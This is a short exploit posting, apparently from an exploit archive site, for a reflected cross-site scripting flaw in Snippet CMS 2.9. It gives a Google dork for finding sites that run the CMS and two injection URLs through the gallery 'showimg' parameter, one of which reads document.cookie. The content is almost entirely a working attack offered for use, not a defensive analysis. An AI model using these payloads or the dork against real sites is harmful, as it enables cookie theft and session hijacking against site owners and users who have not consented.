Home / exploits Snippet CMS 2.9 Cross Site Scripting
Posted on 26 September 2011
Exploit Title: Snippet CMS v2.9 XSS Vulnerability Google Dork: "Powered by Snippet CMS" Date: 23.09.2011 Author: CoBRa_21 Version: 2.9 Tested on: Unix Server ------------------------------------------------------------------------------------------------------- Exploits http://localhost/path/?page=gallery&showgal=CoBRa_21&showimg="><script>alert(document.cookie)</script> http://localhost/path/?page=gallery&showgal=CoBRa_21&showimg="><script>alert(/CoBRa_21/)</script> ------------------------------------------------------------------------------------------------------- Thanks e-banka.org & cyber-warrior.org
